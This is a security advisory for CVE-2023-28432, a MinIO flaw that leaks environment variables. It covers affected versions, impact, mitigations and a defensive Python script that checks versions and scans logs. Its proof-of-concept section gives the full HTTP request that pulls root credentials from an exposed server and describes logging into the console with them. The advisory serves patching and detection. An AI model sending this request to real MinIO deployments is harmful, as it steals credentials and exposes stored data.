MinIO Information Disclosure – CVE-2023-28432

Vulnerable Version

Versions from RELEASE.2019-12-17T23-16-33Z up to RELEASE.2023-03-20T20-16-18Z (the release that fixes the issue).

Fixed Version

RELEASE.2023-03-20T20-16-18Z or later

Base Score

7.5 (High)

Vendor Description:

MinIO is a high-performance, open-source object storage solution that fully supports Amazon S3 APIs. It is commonly used to store unstructured data such as photographs, movies, log files, and backups in both standalone and distributed (clustered) environments. MinIO is intended for cloud-native environments and provides scalability, high availability, and integration with Kubernetes. Because of its lightweight design and good API compatibility, it is widely used in organizations for private cloud storage and modern data lake designs.

CVE-2023-28432 description:

The vulnerability occurs because MinIO returns all of its environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, in a response, exposing sensitive information. Unauthorized parties that can reach the endpoint may therefore obtain critical information such as secret keys and passwords.

The vulnerable code is in MinIO's bootstrap-peer-server.go file, specifically in the VerifyHandler function, which checks the cluster deployment and returns the system configuration, including environment variables.

The getServerSystemCfg function retrieves all environment variables beginning with the MINIO_ prefix and stores them in the system configuration.

Impact:

  • Sensitive Information Exposure: Allows unauthorized access to environment variables in MinIO cluster deployments.
  • Credentials Disclosure: Attackers can obtain secrets such as MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.
  • Unauthorized Access: Exposed credentials may permit attackers to log in and access MinIO services.
  • Data Manipulation: Attackers could read, modify, or delete data stored in the MinIO cluster.

Mitigations:

  • Upgrade Immediately: Update MinIO to RELEASE.2023-03-20T20-16-18Z or later, where the vulnerability is patched.
  • Secure Secrets: Protect sensitive values (e.g., MINIO_SECRET_KEY, MINIO_ROOT_PASSWORD) and do not store them where unauthorized parties can read them.
  • Restrict Network Access: Allow access to the MinIO cluster only from trusted and authorized hosts.
  • Follow Principle of Least Privilege: Limit user permissions to the minimum necessary.
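To support the first and third mitigations, the following Python helper (an added example, not part of the original post or of MinIO's own code) decides whether a given MinIO release tag falls inside the range stated above and scans access-log lines for calls to the bootstrap verify endpoint that did not come from a known cluster peer. The Common Log Format, the peer address allow-list and the log lines are assumed and constructed for the example; MinIO hotfix tag suffixes are tolerated on the assumption that they do not change the ordering.

```python
import re
from datetime import datetime, timezone

# Range stated in the advisory: first vulnerable release (inclusive), fixed release (exclusive).
FIRST_VULNERABLE = "RELEASE.2019-12-17T23-16-33Z"
FIXED = "RELEASE.2023-03-20T20-16-18Z"
VERIFY_PATH = "/minio/bootstrap/v1/verify"

# MinIO tags look like RELEASE.YYYY-MM-DDTHH-MM-SSZ; a trailing ".hotfix..." suffix is
# tolerated (assumption) and ignored for ordering. The log regex is Common Log Format
# as written by a reverse proxy in front of MinIO (assumption).
_RELEASE_RE = re.compile(r"^RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z(?:\..*)?$")
_LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')


def parse_release(tag: str) -> datetime:
    """Convert a MinIO release tag into an aware UTC datetime so tags can be ordered."""
    m = _RELEASE_RE.match(tag.strip())
    if not m:
        raise ValueError(f"not a MinIO release tag: {tag!r}")
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S").replace(tzinfo=timezone.utc)


def is_vulnerable_release(tag: str) -> bool:
    """True when FIRST_VULNERABLE <= tag < FIXED, i.e. the build still leaks its environment."""
    return parse_release(FIRST_VULNERABLE) <= parse_release(tag) < parse_release(FIXED)


def find_verify_requests(lines, trusted_peers):
    """Return (source_ip, timestamp, method) for each hit on the verify endpoint from an
    address that is not a known cluster peer; only peers have any reason to call it."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]  # drop any query string before comparing
        if path == VERIFY_PATH and m["ip"] not in trusted_peers:
            hits.append((m["ip"], m["ts"], m["method"]))
    return hits


# Constructed sample log: one legitimate peer call, one external probe, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.11 - - [21/Mar/2023:10:00:01 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Mar/2023:10:00:05 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Mar/2023:10:00:09 +0000] "GET /minio/health/live HTTP/1.1" 200 0',
]
CLUSTER_PEERS = {"10.0.0.11", "10.0.0.12"}  # assumed peer addresses for the sample

if __name__ == "__main__":
    print(FIXED, "vulnerable" if is_vulnerable_release(FIXED) else "fixed")
    for ip, ts, method in find_verify_requests(SAMPLE_LOG, CLUSTER_PEERS):
        print(f"ALERT {ts} {method} {VERIFY_PATH} from untrusted {ip}")
```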

POC

The issue exists in the API endpoint http://your-ip:9000/minio/bootstrap/v1/verify. Sending the following request retrieves all environment variables:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

(screenshot of the response)

It can be seen that MINIO_ROOT_USER and MINIO_ROOT_PASSWORD are exposed.

Using this username and password, the Web console can be accessed:

(screenshots of the Web console login)

POC Video
